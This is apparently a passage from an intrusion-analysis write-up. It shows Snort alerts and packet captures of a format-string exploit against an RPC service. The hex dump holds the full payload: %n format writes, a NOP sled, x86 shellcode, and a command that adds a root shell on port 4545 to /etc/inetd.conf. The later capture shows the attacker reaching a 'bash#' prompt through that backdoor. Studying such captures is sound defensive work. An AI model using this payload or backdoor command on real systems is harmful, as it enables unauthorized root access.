##### THE ATTACK ###### The actual exploit is launched. Snort Alerts ------------ Nov 7 23:11:51 ids snort[1260]: IDS362 - MISC - Shellcode X86 NOPS-UDP: 216.216.74.2:710 -> 172.16.1.107:871 Snort Capture ------------- 11/07-23:11:50.870124 216.216.74.2:710 -> 172.16.1.107:871 UDP TTL:42 TOS:0x0 ID:16143 IpLen:20 DgmLen:476 Len: 456 3E D1 BA B6 00 00 00 00 00 00 00 02 00 01 86 B8 >............... 00 00 00 01 00 00 00 02 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 01 67 04 F7 FF BF ...........g.... 04 F7 FF BF 05 F7 FF BF 05 F7 FF BF 06 F7 FF BF ................ 06 F7 FF BF 07 F7 FF BF 07 F7 FF BF 25 30 38 78 ............%08x 20 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 %08x %08x %08x 25 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 %08x %08x %08x % 30 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 08x %08x %08x %0 38 78 20 25 30 38 78 20 25 30 38 78 20 25 30 38 8x %08x %08x %08 78 20 25 30 32 34 32 78 25 6E 25 30 35 35 78 25 x %0242x%n%055x% 6E 25 30 31 32 78 25 6E 25 30 31 39 32 78 25 6E n%012x%n%0192x%n 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 EB 4B 5E 89 76 AC 83 EE 20 8D 5E 28 83 C6 ...K^.v... .^(.. 20 89 5E B0 83 EE 20 8D 5E 2E 83 C6 20 83 C3 20 .^... .^... .. 83 EB 23 89 5E B4 31 C0 83 EE 20 88 46 27 88 46 ..#.^.1... .F'.F 2A 83 C6 20 88 46 AB 89 46 B8 B0 2B 2C 20 89 F3 *.. .F..F..+, .. 8D 4E AC 8D 56 B8 CD 80 31 DB 89 D8 40 CD 80 E8 .N..V...1...@... B0 FF FF FF 2F 62 69 6E 2F 73 68 20 2D 63 20 65 ..../bin/sh -c e 63 68 6F 20 34 35 34 35 20 73 74 72 65 61 6D 20 cho 4545 stream 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 20 tcp nowait root 2F 62 69 6E 2F 73 68 20 73 68 20 2D 69 20 3E 3E /bin/sh sh -i >> 20 2F 65 74 63 2F 69 6E 65 74 64 2E 63 6F 6E 66 /etc/inetd.conf 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 6E ;killall -HUP in 65 74 64 00 00 00 00 09 6C 6F 63 61 6C 68 6F 73 etd.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:10.960369 216.216.74.2:1285 -> 172.16.1.107:4545 TCP TTL:42 TOS:0x0 ID:16146 IpLen:20 DgmLen:60 DF ******S* Seq: 0x2AE4B813 Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 135151135 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:10.962158 172.16.1.107:4545 -> 216.216.74.2:1285 TCP TTL:63 TOS:0x0 ID:7078 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0xAC7DCC8F Ack: 0x2AE4B814 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 22537014 135151135 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.143811 216.216.74.2:1285 -> 172.16.1.107:4545 TCP TTL:42 TOS:0x0 ID:16151 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x2AE4B814 Ack: 0xAC7DCC90 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 135151147 22537014 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.179171 172.16.1.107:4545 -> 216.216.74.2:1285 TCP TTL:63 TOS:0x0 ID:7079 IpLen:20 DgmLen:58 DF ***AP*** Seq: 0xAC7DCC90 Ack: 0x2AE4B814 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 22537036 135151147 62 61 73 68 23 20 bash# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.293059 216.216.74.2:1285 -> 172.16.1.107:4545 TCP TTL:42 TOS:0x0 ID:16152 IpLen:20 DgmLen:1076 DF ***AP*** Seq: 0x2AE4B814 Ack: 0xAC7DCC90 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 135151147 22537014 69 64 00 00 4F 01 00 00 43 06 00 00 41 01 00 00 id..O...C...A... 7A 06 00 00 4A 03 00 00 34 03 00 00 A7 05 00 00 z...J...4....... 48 06 00 00 AC 06 00 00 C2 01 00 00 A0 04 00 00 H............... 44 05 00 00 8A 03 00 00 78 05 00 00 90 06 00 00 D.......x....... 15 02 00 00 F5 04 00 00 4F 05 00 00 86 02 00 00 ........O....... A0 01 00 00 00 00 00 00 A9 05 00 00 93 03 00 00 ................ 55 03 00 00 62 02 00 00 99 02 00 00 55 05 00 00 U...b.......U... 4D 06 00 00 B3 02 00 00 17 05 00 00 68 05 00 00 M...........h... 00 00 00 00 FE 01 00 00 D0 05 00 00 00 00 00 00 ................ 77 00 00 00 9C 00 00 00 B1 00 00 00 3D 00 00 00 w...........=... 00 00 00 00 D1 00 00 00 00 00 00 00 00 00 00 00 ................ B7 05 00 00 EE 03 00 00 00 00 00 00 D0 03 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 99 03 00 00 ................ 00 00 00 00 44 03 00 00 00 00 00 00 90 05 00 00 ....D........... A4 05 00 00 00 00 00 00 69 05 00 00 2E 04 00 00 ........i....... 0D 06 00 00 95 06 00 00 3E 02 00 00 86 03 00 00 ........>....... 73 02 00 00 77 01 00 00 97 06 00 00 C8 05 00 00 s...w........... 00 00 00 00 B2 03 00 00 A9 04 00 00 37 05 00 00 ............7... B3 06 00 00 E3 04 00 00 18 02 00 00 66 06 00 00 ............f... C8 03 00 00 A9 06 00 00 70 06 00 00 00 00 00 00 ........p....... AB 04 00 00 00 00 00 00 00 00 00 00 35 06 00 00 ............5... 00 03 00 00 AD 03 00 00 00 00 00 00 DF 04 00 00 ................ 5B 02 00 00 A0 06 00 00 DA 03 00 00 00 00 00 00 [............... 00 00 00 00 00 00 00 00 00 00 00 00 FD 03 00 00 ................ 00 00 00 00 00 00 00 00 8F 06 00 00 00 00 00 00 ................ 84 06 00 00 99 00 00 00 17 04 00 00 A5 06 00 00 ................ 9E 01 00 00 BE 03 00 00 00 00 00 00 DE 05 00 00 ................ 8A 05 00 00 8A 06 00 00 91 04 00 00 60 05 00 00 ............`... 0A 03 00 00 18 05 00 00 00 00 00 00 F2 04 00 00 ................ 3E 06 00 00 84 02 00 00 75 04 00 00 81 06 00 00 >.......u....... 78 01 00 00 00 00 00 00 09 04 00 00 8F 05 00 00 x............... 6A 05 00 00 1C 05 00 00 BA 02 00 00 3E 03 00 00 j...........>... A7 03 00 00 CF 04 00 00 1B 04 00 00 23 02 00 00 ............#... B5 06 00 00 E2 05 00 00 E9 01 00 00 34 04 00 00 ............4... 8D 01 00 00 93 06 00 00 82 04 00 00 19 04 00 00 ................ 00 00 00 00 54 06 00 00 50 05 00 00 7E 04 00 00 ....T...P...~... 6D 06 00 00 80 00 00 00 13 06 00 00 23 04 00 00 m...........#... 0A 05 00 00 00 00 00 00 BC 06 00 00 B4 04 00 00 ................ 00 00 00 00 27 00 00 00 16 05 00 00 BE 06 00 00 ....'........... BA 06 00 00 0F 04 00 00 00 00 00 00 68 03 00 00 ............h... 7B 03 00 00 F5 05 00 00 61 06 00 00 00 00 00 00 {.......a....... 00 00 00 00 00 00 00 00 9A 03 00 00 3F 02 00 00 ............?... 4D 01 00 00 A5 03 00 00 00 00 00 00 00 00 00 00 M............... 6B 06 00 00 DA 05 00 00 DB 02 00 00 5F 06 00 00 k..........._... DE 03 00 00 76 05 00 00 00 01 00 00 FD 02 00 00 ....v........... E4 02 00 00 E1 00 00 00 5A 06 00 00 00 00 00 00 ........Z....... 68 04 00 00 00 00 00 00 89 04 00 00 33 05 00 00 h...........3... 20 06 00 00 58 04 00 00 0A 06 00 00 49 02 00 00 ...X.......I... 00 00 00 00 37 02 00 00 30 01 00 00 D4 04 00 00 ....7...0....... 00 00 00 00 00 00 00 00 93 05 00 00 C7 05 00 00 ................ C0 01 00 00 00 00 00 00 E1 05 00 00 7C 02 00 00 ............|... 6E 04 00 00 15 04 00 00 B2 00 00 00 86 06 00 00 n............... 13 01 00 00 70 02 00 00 00 00 00 00 8F 03 00 00 ....p........... A6 03 00 00 0E 05 00 00 A4 06 00 00 83 04 00 00 ................ 3F 06 00 00 BA 05 00 00 B0 06 00 00 53 06 00 00 ?...........S... 3D 04 00 00 26 00 00 00 E1 04 00 00 B4 02 00 00 =...&........... 65 04 00 00 25 03 00 00 9C 02 00 00 EA 01 00 00 e...%........... 7C 03 00 00 00 00 00 00 CD 05 00 00 00 00 00 00 |............... 00 00 00 00 99 06 00 00 70 05 00 00 15 06 00 00 ........p....... 9B 05 00 00 60 02 00 00 4D 02 00 00 F6 05 00 00 ....`...M....... 60 06 00 00 E6 00 00 00 96 05 00 00 08 06 00 00 `............... 00 00 00 00 00 00 00 00 98 03 00 00 A8 02 00 00 ................ 00 00 00 00 24 06 00 00 B3 01 00 00 7F 06 00 00 ....$........... 00 00 00 00 1D 00 00 00 6C 04 00 00 7D 03 00 00 ........l...}... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.293762 216.216.74.2:1285 -> 172.16.1.107:4545 TCP TTL:233 TOS:0x0 ID:16157 IpLen:20 DgmLen:40 *****R** Seq: 0x2AE4B814 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.296066 172.16.1.107:4545 -> 216.216.74.2:1285 TCP TTL:63 TOS:0x0 ID:7080 IpLen:20 DgmLen:52 DF ***A**** Seq: 0xAC7DCC96 Ack: 0x2AE4BC14 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 22537048 135151147 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.298639 172.16.1.107:4545 -> 216.216.74.2:1285 TCP TTL:63 TOS:0x0 ID:7081 IpLen:20 DgmLen:52 DF ***A*R** Seq: 0xAC7DCD4B Ack: 0x2AE4BC14 Win: 0x7C70 TcpLen: 32 TCP Options (3) => NOP NOP TS: 22537048 135151147 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 11/07-23:12:11.411650 216.216.74.2:1285 -> 172.16.1.107:4545 TCP TTL:233 TOS:0x0 ID:16160 IpLen:20 DgmLen:40 *****R** Seq: 0x2AE4BC14 Ack: 0x0 Win: 0x0 TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+